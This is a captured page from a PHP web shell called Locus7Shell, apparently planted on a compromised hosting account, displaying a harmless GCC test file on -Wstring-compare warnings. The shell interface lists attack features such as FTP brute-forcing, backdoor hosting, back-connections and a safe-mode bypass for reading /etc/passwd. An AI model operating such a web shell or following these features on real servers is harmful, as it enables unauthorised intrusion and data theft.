Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Wstring-compare-3.c (2.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR middle-end/95673 - missing -Wstring-compare for an impossible strncmp test
   { dg-do compile }
   { dg-options "-O2 -Wall -Wstring-compare -Wno-stringop-overread -ftrack-macro-expansion=0" } */

typedef __SIZE_TYPE__ size_t;

extern int strcmp (const char*, const char*);
extern int strncmp (const char*, const char*, size_t);

void sink (int, ...);

extern char a3[3];

int nowarn_strcmp_one_use_ltz (int c)
{
  const char *s = c ? "1234" : a3;
  int n = strcmp (s, "123");
  return n < 0;
}


int nowarn_strcmp_one_use_eqnz (int c)
{
  const char *s = c ? "12345" : a3;
  int n = strcmp (s, "123");
  return n == 1;
}


int warn_strcmp_one_use_eqz (int c)
{
  const char *s = c ? "123456" : a3;
  int n = strcmp (s, "123");    // { dg-warning "'strcmp' of a string of length 3 and an array of size 3 evaluates to nonzero" }
  return n == 0;                // { dg-message "in this expression" }
}


int warn_strcmp_one_use_bang (int c)
{
  const char *s = c ? "1234567" : a3;
  int n = strcmp (s, "123");    // { dg-warning "'strcmp' of a string of length 3 and an array of size 3 evaluates to nonzero" }
  return !n;                    // { dg-message "in this expression" }
}


int warn_strcmp_one_use_bang_bang (int c)
{
  const char *s = c ? "12345678" : a3;
  int n = strcmp (s, "123");    // { dg-warning "'strcmp' of a string of length 3 and an array of size 3 evaluates to nonzero" }
  return !!n;                   // { dg-message "in this expression" }
}


_Bool warn_one_use_bool (int c)
{
  const char *s = c ? "123456789" : a3;
  int n = strcmp (s, "123");    // { dg-warning "'strcmp' of a string of length 3 and an array of size 3 evaluates to nonzero" }
  return (_Bool)n;              // { dg-message "in this expression" }
}


int warn_strcmp_one_use_cond (int c)
{
  const char *s = c ? "1234567890" : a3;
  int n = strcmp (s, "123");    // { dg-warning "'strcmp' of a string of length 3 and an array of size 3 evaluates to nonzero" }
  return n ? 3 : 5;             // { dg-message "in this expression" }
}


int nowarn_strcmp_multiple_uses (int c)
{
  const char *s = c ? "1234" : a3;
  int n = strcmp (s, "123");
  sink (n < 0);
  sink (n > 0);
  sink (n <= 0);
  sink (n >= 0);
  sink (n + 1);
  return n;
}


int warn_strcmp_multiple_uses (int c)
{
  const char *s = c ? "12345" : a3;
  int n = strcmp (s, "123");    // { dg-warning "'strcmp' of a string of length 3 and an array of size 3 evaluates to nonzero" }
  sink (n < 0);
  sink (n > 0);
  sink (n <= 0);
  sink (n >= 0);
  sink (n == 0);                // { dg-message "in this expression" }
  return n;
}


int warn_strncmp_multiple_uses (int c)
{
  const char *s = a3;
  int n = strncmp (s, "1234", 4); // { dg-warning "'strncmp' of a string of length 4, an array of size 3 and bound of 4 evaluates to nonzero" }
  sink (n < 0);
  sink (n > 0);
  sink (n <= 0);
  sink (n >= 0);
  sink (n == 0);                // { dg-message "in this expression" }
  return n;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--